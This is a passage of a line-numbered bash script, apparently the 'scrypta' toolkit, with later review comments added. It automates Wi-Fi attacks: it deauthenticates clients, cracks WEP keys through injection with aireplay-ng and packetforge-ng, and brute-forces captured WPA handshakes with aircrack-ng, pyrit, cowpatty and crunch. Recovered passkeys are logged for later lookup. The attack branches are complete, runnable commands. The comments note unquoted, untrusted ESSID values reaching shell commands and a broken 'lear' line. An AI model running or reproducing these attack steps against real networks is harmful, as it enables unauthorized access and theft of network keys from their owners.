  2469.        read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
  2470.        echo ""
  2471.        Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  2472.        echo ""
  2473.        echo "Chosen Target Details."
  2474.        echo "$Chosen_Client_MAC"
  2475.        sleep 4
  2476.        fi
  2477.  
  # Any answer other than n/N/NO/no/No repeats the loop from the top.
  2478. clear
  2479. echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
  2480. read -e CONFIRM
  2481. case $CONFIRM in
  2482. n|N|NO|no|No)
  2483. break ;;
  2484. *) echo "" ;;
  2485. esac
  2486. done
  2487.  
  # Menu option 4, part 3: clean up scan artifacts and file the capture.
  # All paths are relative, so this acts on the current directory; it is only
  # the temp directory if the unchecked cd at the start of the branch worked.
  2488. rm WPA_Scan.txt
  2489. rm temp0.txt
  2490. rm PresentedAPs.txt
  2491.  
  2492. rm WPA_ClientScan.txt
  2493. rm temp1.txt
  2494. rm ConnectedClientsScan.txt
  2495.  
  # Signals every airodump-ng process pidof finds, not only the ones this branch
  # started.
  2496. kill `pidof airodump-ng`
  2497. rm *.csv
  2498. rm *.netxml
  # NOTE(review): $AP_essid came from the air and is used unquoted as a file
  # name, so whitespace, glob characters or '/' in it change the destination.
  # If more than one .cap file matches, mv receives several sources and a
  # non-directory target.
  # Forensic note: captured handshakes are kept under
  # $HOME/scrypta/Captured_Handshakes/, named after the ESSID.
  2499. mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
  2500. cd
  2501. ;;
  2502.  
  2503. ###### [5] WEP Attacks ######
  2504. 5)
  # Menu option 5, part 1: scan for WEP networks, let the operator pick one by
  # number, scan it for clients, and ask whether any were seen.
  # Defensive note: WEP is cryptographically broken; the mitigation for a
  # network that shows up in this scan is to retire WEP in favour of WPA2/WPA3.
  # NOTE(review): cd is not checked; on failure everything below runs in the
  # current directory.
  2505. cd $HOME/scrypta/temp
  2506. clear
  2507. echo $RED"Scan for possible targets."$STAND
  2508. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
  2509. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  2510.  
  # xterm's -l/-lf logging writes the airodump-ng screen output to WEP_Scan.txt.
  2511. xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0
  2512.  
  2513. sleep 1
  # Keep the last AP table from the log (from the last 'CIPHER' header up to the
  # 'STATION' section), minus its first two lines, its last line and rows
  # showing '<length:  0>'.
  2514. tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length:  0>/d' > temp0.txt
  2515. sleep 1
  # Numbered menu built from field 10 of each row (used as the ESSID below).
  2516. PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//' )
  2517.  
  2518. clear
  2519. echo $RED"Please choose a target"$STAND
  2520. echo ""
  2521. echo "$PresentedAPs"
  2522. echo ""
  2523. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  2524. echo ""
  2525.  
  # NOTE(review): operator input is placed unquoted into the sed script.
  2526. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  # Fields 10, 1 and 6 of the chosen row. These were received over the air and
  # are untrusted; later commands in this branch expand them unquoted.
  2527. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2528. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2529. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2530.  
  2531. clear
  2532. echo $RED"Chosen Target Details."$STAND
  2533. echo $RED"Aceess Point essid$STAND: $AP_essid"
  2534. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  2535. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  2536. echo ""
  2537. echo $RED"Scan for clients connected to$STAND $AP_essid."
  2538. echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
  2539. read -p $GREEN"Press [Enter] to start the scan."$STAND
  2540.  
  2541. sleep 1
  # Logged client scan limited to the chosen channel and BSSID.
  2542. xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0
  2543.  
  # The y/n answer selects one of the two if-blocks that follow this run; any
  # other answer matches neither.
  2544. echo ""
  2545. echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
  2546. read answer
  2547.  
  # Menu option 5, "clients present" path: pick a client from the scan log,
  # run the capture and injection windows, wait 60 seconds, run aircrack-ng,
  # and append the result to the recovered-key store.
  2548. if [[ $answer == "y" || $answer == "Y" ]]; then
  2549.  
  # Second field of each row after the last 'STATION' header in the log, minus
  # the first two lines and the last line.
  2550.        tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
  2551.        sleep 2
  2552.        PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//')
  2553.        
  2554.        sleep 2
  2555.        clear
  2556.        echo "Please choose a client"
  2557.        echo ""
  2558.        echo "$PresentedClients"
  2559.        echo ""
  2560.        
  2561.        read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
  2562.        echo ""
  2563.  
  # Chosen_ClientMAC holds the operator's selection but is not read again in
  # this block; ClientMAC, which the commands below use, is field 1 of
  # Chosen_AP_Details.
  2564.        Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
  2565.        ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2566.  
  2567.        echo $RED"You've chosen:"
  2568.        echo $RED"Client$STAND: $ClientMAC"
  2569.        echo ""
  2570.        
  # Repeats until the operator confirms success with y/Y/YES/yes/Yes.
  2571.        while true
  2572.        do
  2573.  
  2574.        read -p $GREEN"Press [Enter] to start the attack.$STAND"
  # Three background xterm windows: one capture (file prefix "capture") and two
  # aireplay-ng runs. NOTE(review): each -e argument is one string that embeds
  # $AP_essid, $AP_bssid and $ClientMAC unvalidated; the "&&" in it suggests
  # xterm hands the string to a shell, so metacharacters in an ESSID would be
  # interpreted on the operator's machine - confirm against xterm's -e handling.
  2575.        xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
  2576.        xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  2577.        xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  2578.        echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
  2579.        echo "Please wait for aircrack to start...$STAND"
  2580.        sleep 60
  # -l writes any recovered key to WEPpasskey.txt; the exit status is not
  # checked, so a missing file only shows up as an error from cat below.
  2581.        aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
  2582.        sleep 2
  2583.        passkey=$(cat WEPpasskey.txt)
  2584.        sleep 2
  # Signals every xterm process pidof finds, not only the three started above.
  2585.        kill `pidof xterm`
  2586.        echo ""
  2587.        echo $RED"Target essid$STAND: $AP_essid"
  2588.        echo $RED"Target bssid$STAND: $AP_bssid"
  2589.        echo $RED"Target Pass-Key$STAND: $passkey"
  2590.  
  2591.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  2592.        read -e CONFIRM
  2593.        case $CONFIRM in
  2594.        y|Y|YES|yes|Yes)
  2595.        break ;;
  2596.        *) echo $RED"Please re-enter information$STAND" ;;
  2597.        esac
  2598.        done
  2599.  
  # Forensic note: ESSID, BSSID and key are appended in plaintext to
  # $HOME/scrypta/Recovered-WPA-Passkeys.txt (the same file is used for WEP
  # results despite its name), with whatever permissions the umask gives it.
  2600.        echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2601.        echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2602.        echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2603.        echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2604.        cd
  2605.        fi
  # Menu option 5, "no clients" path: start an IV capture, run a fixed sequence
  # of aireplay-ng / packetforge-ng steps using $mon0mac as the source address,
  # then optionally run aircrack-ng on the collected .ivs files.
  # $mon0mac is set near the top of the script from `ip addr` output.
  2606. if [[ $answer == "n" || $answer == "N" ]]; then
  # Repeats until the operator confirms success with y/Y/YES/yes/Yes.
  2607.        while true
  2608.        do
  2609.  
  2610.        echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
  # $! here is the PID of the xterm wrapper, which is what gets killed later.
  2611.        xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
  2612.        sleep 2
  # Each step is followed by a fixed 2-second sleep; none of the exit statuses
  # is checked, so later steps run even if an earlier one failed.
  2613.        aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
  2614.        sleep 2
  2615.        aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
  2616.        sleep 2
  # *.xor is an unquoted glob over the current directory; more than one match
  # passes extra arguments to packetforge-ng.
  2617.        packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
  2618.        sleep 2
  2619.        xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
  2620.        sleep 2
  2621.  
  2622.        echo ""
  2623.        echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
  2624.        read option
  2625.        
  # Only a lowercase "y" is accepted here, unlike the y/Y check on $answer.
  2626.        if [[ $option == "y" ]]; then
  2627.               aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
  2628.               passkey=$(cat WEPpasskey.txt)
  2629.               rm WEPpasskey.txt
  2630.               kill ${AIRODUMPPID}
  2631.               kill ${AIREPLAYPID}
  # Relative globs: these delete from the current directory, which is the temp
  # directory only if the unchecked cd at the start of the branch succeeded.
  2632.               rm *.ivs
  2633.               rm *.cap
  2634.               rm *.xor
  2635.               rm arp-packet
  # Forensic note: the result is appended in plaintext to
  # $HOME/scrypta/Recovered-WPA-Passkeys.txt.
  2636.               echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2637.               echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2638.               echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2639.               echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2640.               fi
  2641.  
  # If the operator did not answer "y" above, the two background xterm windows
  # are still running when the loop repeats.
  2642.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  2643.        read -e CONFIRM
  2644.        case $CONFIRM in
  2645.        y|Y|YES|yes|Yes)
  2646.        break ;;
  2647.        *) echo ""
  2648.        esac
  2649.        done
  2650.        fi
  2651.        cd
  2652. ;;
  2653.  
  2654. ###### [6] Attack Handshake.cap Files ######
  2655. 6)
  # Menu option 6: choose how to test a saved handshake capture file.
  # Options 1-3 read candidates from a wordlist file; options 4-6 generate them
  # with crunch. The choice is stored in $option for the if-blocks that follow.
  # Defensive note: every option here works offline on a capture file, so
  # nothing at this stage is visible on the network; what protects a PSK
  # network once a handshake has been captured is the strength of the
  # passphrase.
  2656. clear
  2657. echo $RED"###################################"
  2658. echo "#                                 #"
  2659. echo "#         With a wordlist         #"
  2660. echo "# $GREEN[1]$BLUE = Aircrack-ng               $RED#"
  2661. echo "# $GREEN[2]$BLUE = Pyrit                     $RED#"
  2662. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty          $RED#"
  2663. echo "#                                 #"
  2664. echo "#       Without a wordlist        #"
  2665. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng      $RED#"
  2666. echo "# $GREEN[5]$BLUE = Crunch + Pyrit            $RED#"
  2667. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
  2668. echo "#                                 #"
  2669. echo "###################################"
  2670. echo
  2671. echo $GREEN"Choose an option?"$STAND
  2672. read option
  # Option 6.1: prompt for a capture file and a wordlist, echo the command line
  # back for confirmation, then run aircrack-ng with them.
  # NOTE(review): both paths are expanded unquoted, so a path containing
  # whitespace or glob characters is split or expanded before aircrack-ng sees
  # it, and a value starting with "-" is read as an option.
  2673. if [[ $option == "1" ]]; then
  2674.    clear
  2675.    echo $RED
  2676.    echo "############################################"
  2677.    echo "#                                          #"
  2678.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  2679.    echo "#$STAND              (Aircrack-ng)               $RED#"
  2680.    echo "#                                          #"
  2681.    echo "############################################"
  2682.    echo
  2683.    echo $RED"eg: /root/Desktop/sky12345.cap"
  2684.    read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2685.    echo
  2686.    echo $RED"eg: /root/Desktop/wordlist.txt"
  2687.    read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  2688.    clear
  2689.    # Chosen user input options
  2690.    ############################
  2691.    echo
  2692.    echo $RED"You've chosen:"
  2693.    echo "=============="
  2694.    echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2695.    echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  2696.    echo
  2697.    echo $RED"Commands to launch:"
  2698.    echo "==================="
  2699.    echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
  2700.    echo
  2701.    # Launch chosen commands/options
  2702.    #################################
  2703.    read -p $GREEN"Press enter to start"$STAND
  2704.    clear
  2705.    aircrack-ng -w $WordlistNameLocation $CapNameLocation
  2706.    fi
  # Option 6.2: prompt for a BSSID, a capture file and a wordlist, echo the
  # command line back, then run pyrit attack_passthrough with them.
  # NOTE(review): all three values are expanded unquoted in the final command,
  # so whitespace or glob characters in them change the argument list.
  2707. if [[ $option == "2" ]]; then
  2708.    clear
  2709.    echo $RED
  2710.    echo "############################################"
  2711.    echo "#                                          #"
  2712.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  2713.    echo "#$STAND                 (Pyrit)                  $RED#"
  2714.    echo "#                                          #"
  2715.    echo "############################################"
  2716. echo
  2717. echo $RED"eg: 00:11:22:33:44:55"
  2718. read -p $GREEN"Access Point bssid$STAND: " bssid
  2719. echo
  2720. echo $RED"eg: /root/Desktop/sky12345.cap"
  2721. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2722. echo
  2723. echo $RED"eg: /root/Desktop/wordlist.txt"
  2724. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  2725. clear
  2726. # Chosen user input options
  2727. ############################
  2728. echo
  2729. echo $RED"You've chosen:"
  2730. echo "=============="
  2731. echo $RED"Access Point bssid$STAND: $bssid"
  2732. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2733. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  2734. echo
  2735. echo $RED"Commands to launch:"
  2736. echo "==================="
  2737. echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
  2738. echo
  2739. # Launch chosen commands/options
  2740. #################################
  2741. read -p $GREEN"Press enter to start"$STAND
  2742. clear
  2743. pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
  2744.                  fi
  # Option 6.3: prompt for an ESSID, a capture file and a wordlist, echo the
  # pipeline back, then feed the wordlist through pyrit into cowpatty.
  # NOTE(review): $essid, $CapNameLocation and $WordlistNameLocation are
  # expanded unquoted; an ESSID containing a space is split into several
  # arguments for both pyrit -e and cowpatty -s.
  2745.                  if [[ $option == "3" ]]; then
  2746.                                   clear
  2747. echo $RED
  2748. echo "############################################################################"
  2749. echo "#                                                                          #"
  2750. echo "#$STAND                   Attack Capture File Using A Wordlist                   $RED#"
  2751. echo "#$STAND                            (Pyrit + Cowpatty)                            $RED#"
  2752. echo "#                                                                          #"
  2753. echo "############################################################################"$STAND
  2754. echo
  2755. echo $RED"eg: sky12345"
  2756. read -p $GREEN"Access Point essid$STAND: " essid
  2757. echo
  2758. echo $RED"eg: /root/Desktop/sky12345.cap"
  2759. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2760. echo
  2761. echo $RED"eg: /root/Desktop/wordlist.txt"
  2762. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  2763. clear
  2764. # Chosen user input options
  2765. ############################
  2766. echo
  2767. echo $RED"You've chosen:"
  2768. echo "=============="
  2769. echo $RED"Access Point essid$STAND: $essid"
  2770. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2771. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  2772. echo
  2773. echo $RED"Commands to launch:"
  2774. echo "==================="
  2775. echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  2776. echo
  2777. # Launch chosen commands/options
  2778. #################################
  2779. read -p $GREEN"Press enter to start"$STAND
  2780. clear
  2781. cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  2782.                  fi
  # Option 6.4: prompt for a character set, a length range, free-form crunch
  # options, an ESSID and a capture file; echo the pipeline back; then pipe
  # crunch's generated candidates into aircrack-ng.
  # NOTE(review): every prompted value is expanded unquoted. For
  # $OptionalCrunchOptions the word splitting is what turns the typed text into
  # separate options; for the other values it means whitespace or glob
  # characters change the argument list.
  2783.                  if [[ $option == "4" ]]; then
  # NOTE(review): `lear` is not defined anywhere in the visible script; it
  # looks like a typo for `clear` (the other options call clear here), so this
  # line presumably prints a "command not found" error and leaves the screen
  # as it was.
  2784.                                   lear
  2785. echo $RED
  2786. echo "############################################################################"
  2787. echo "#                                                                          #"
  2788. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  2789. echo "#$STAND                          (Crunch + Aircrack-ng)                          $RED#"
  2790. echo "#                                                                          #"
  2791. echo "############################################################################"$STAND
  2792. echo
  2793. echo $RED"eg: abcdef23456789"
  2794. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  2795. echo
  2796. echo $RED"eg: 10"
  2797. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  2798. echo
  2799. echo $RED"eg: 10"
  2800. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  2801. echo
  2802. echo $RED"eg:"
  2803. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  2804. echo $RED"-s XXXXXXXXXX = Start point."
  2805. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  2806. echo
  2807. echo $RED"eg: sky12345"
  2808. read -p $GREEN"Access Point essid$STAND: " essid
  2809. echo
  2810. echo $RED"eg: /root/Desktop/sky12345.cap"
  2811. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2812. clear
  2813. # Chosen user input options
  2814. ############################
  2815. echo
  2816. echo $RED"You've chosen:"
  2817. echo "=============="
  2818. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  2819. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  2820. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  2821. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  2822. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2823. echo $RED"essid$STAND: $essid"
  2824. echo
  2825. echo $RED"Commands to launch:"
  2826. echo "==================="
  2827. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
  2828. echo
  2829. # Launch chosen commands/options
  2830. #################################
  2831. read -p $GREEN"Press enter to start"$STAND
  2832. clear
  2833. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
  2834.                  fi
  # Option 6.5: same prompts as the other crunch-based options (character set,
  # length range, free-form crunch options, ESSID, capture file); the generated
  # candidates are piped into pyrit attack_passthrough.
  # NOTE(review): every prompted value is expanded unquoted, so whitespace or
  # glob characters in any of them change the argument list; the numeric
  # inputs are not checked to be numbers.
  2835.                  if [[ $option == "5" ]]; then
  2836.                                   clear
  2837. echo $RED
  2838. echo "############################################################################"
  2839. echo "#                                                                          #"
  2840. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  2841. echo "#$STAND                             (Crunch + Pyrit)                             $RED#"
  2842. echo "#                                                                          #"
  2843. echo "############################################################################"$STAND
  2844. echo
  2845. echo $RED"eg: abcdef23456789"
  2846. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  2847. echo
  2848. echo $RED"eg: 10"
  2849. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  2850. echo
  2851. echo $RED"eg: 10"
  2852. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  2853. echo
  2854. echo $RED"eg:"
  2855. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  2856. echo $RED"-s XXXXXXXXXX = Start point."
  2857. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  2858. echo
  2859. echo $RED"eg: sky12345"
  2860. read -p $GREEN"Access Point essid$STAND: " essid
  2861. echo
  2862. echo $RED"eg: /root/Desktop/sky12345.cap"
  2863. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2864. clear
  2865. # Chosen user input options
  2866. ############################
  2867. echo
  2868. echo $RED"You've chosen:"
  2869. echo "=============="
  2870. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  2871. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  2872. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  2873. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  2874. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2875. echo $RED"essid$STAND: $essid"
  2876. echo
  2877. echo $RED"Commands to launch:"
  2878. echo "==================="
  2879. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
  2880. echo
  2881. # Launch chosen commands/options
  2882. #################################
  2883. read -p $GREEN"Press enter to start"$STAND
  2884. clear
  2885. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
  2886.                  fi
  # Option 6.6: same prompts as the other crunch-based options (character set,
  # length range, free-form crunch options, ESSID, capture file); the generated
  # candidates go through pyrit passthrough into cowpatty.
  # NOTE(review): every prompted value is expanded unquoted, so whitespace or
  # glob characters in any of them change the argument list; $essid is used
  # twice (pyrit -e and cowpatty -s) and is split the same way in both places.
  2887.                  if [[ $option == "6" ]]; then
  2888.                                   clear
  2889. echo $RED
  2890. echo "############################################################################"
  2891. echo "#                                                                          #"
  2892. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  2893. echo "#$STAND                       (Crunch + Pyrit + Cowpatty)                        $RED#"
  2894. echo "#                                                                          #"
  2895. echo "############################################################################"$STAND
  2896. echo
  2897. echo $RED"eg: abcdef23456789"
  2898. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  2899. echo
  2900. echo $RED"eg: 10"
  2901. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  2902. echo
  2903. echo $RED"eg: 10"
  2904. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  2905. echo
  2906. echo $RED"eg:"
  2907. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  2908. echo $RED"-s XXXXXXXXXX = Start point."
  2909. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  2910. echo
  2911. echo $RED"eg: sky12345"
  2912. read -p $GREEN"Access Point essid$STAND: " essid
  2913. echo
  2914. echo $RED"eg: /root/Desktop/sky12345.cap"
  2915. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  2916. clear
  2917. # Chosen user input options
  2918. ############################
  2919. echo
  2920. echo $RED"You've chosen:"
  2921. echo "=============="
  2922. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  2923. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  2924. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  2925. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  2926. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  2927. echo $RED"essid$STAND: $essid"
  2928. echo
  2929. echo $RED"Commands to launch:"
  2930. echo "==================="
  2931. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  2932. echo
  2933. # Launch chosen commands/options
  2934. #################################
  2935. read -p $GREEN"Press enter to start"$STAND
  2936. clear
  2937. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  2938. fi
  2939. ;;
  2940. 7)
  2941. ###########################
  2942. # Show Recovered Passkeys #
  2943. ###########################
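  # Open the recovered-key store in the desktop's default viewer.
  # The path is quoted so a $HOME containing whitespace or glob characters is
  # passed to gnome-open as a single argument.
  # Forensic note: this file is where the WEP branch of the script appends
  # ESSID, BSSID and key in plaintext.
  gnome-open "$HOME/scrypta/Recovered-WPA-Passkeys.txt"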
  2945.  ;;
  2946. 8)
  2947. ##############################################################################
  2948. # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
  2949. ##############################################################################
  2950. ###################
  2951. # Passkey Checker #
  2952. ###################
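  # Passkey checker: look up an entry in the local recovered-key store by BSSID
  # or ESSID, repeating until the operator declines another search.
  #
  # The search term is typed by the operator. It is matched as a fixed string
  # (-F), quoted, and placed after "--", so whitespace, regex metacharacters or
  # a leading "-" in it cannot change what grep does. An empty term is skipped:
  # left unquoted it made grep take the file path as the pattern and wait on
  # stdin.
  clear
  echo "${RED}How would you like to search."
  echo "${GREEN}[1]${BLUE} = Search using the bssid."
  echo "${GREEN}[2]${BLUE} = Search using the essid."
  echo "${GREEN}[0]${BLUE} = Return To Previous Menu."
  echo "${GREEN}1, 2 or 0?${STAND}"
  read -r option

  if [[ $option == "1" ]]; then
    while true; do
      printf '%s' "${GREEN}Please input the bssid of the access point you would like to check for?${STAND}: "
      read -e -r SEARCHbssid
      if [[ -n $SEARCHbssid ]]; then
        # Entries are written as ESSID, BSSID, passkey, blank line, so one line
        # before and two after the BSSID match show the whole entry.
        grep -F -B 1 -A 2 -- "$SEARCHbssid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
      fi
      echo
      printf '%s' "Would you like to search again? (y or n): "
      read -e -r CONFIRM
      case $CONFIRM in
        n|N|NO|no|No) break ;;
        *) echo "" ;;
      esac
    done
  fi

  if [[ $option == "2" ]]; then
    while true; do
      printf '%s' "${GREEN}Please input the essid of the access point you would like to check for?${STAND}: "
      read -e -r SEARCHessid
      if [[ -n $SEARCHessid ]]; then
        # The ESSID is the first line of an entry; three lines after it cover
        # the BSSID, the passkey and the separator.
        grep -F -A 3 -- "$SEARCHessid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
      fi
      echo
      printf '%s' "Would you like to search again? (y or n): "
      read -e -r CONFIRM
      case $CONFIRM in
        n|N|NO|no|No) break ;;
        *) echo "" ;;
      esac
    done
  fi

  if [[ $option == "0" ]]; then
    echo "Returning To Menu"
  fi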
  2996.  ;;
  2997. 0) exit 0;;
  2998. *) echo "You've chosen an invalid option, please choose again";
  2999. echo "Press [Enter] to continue. . ." ; read ;;
  3000. esac
  3001. done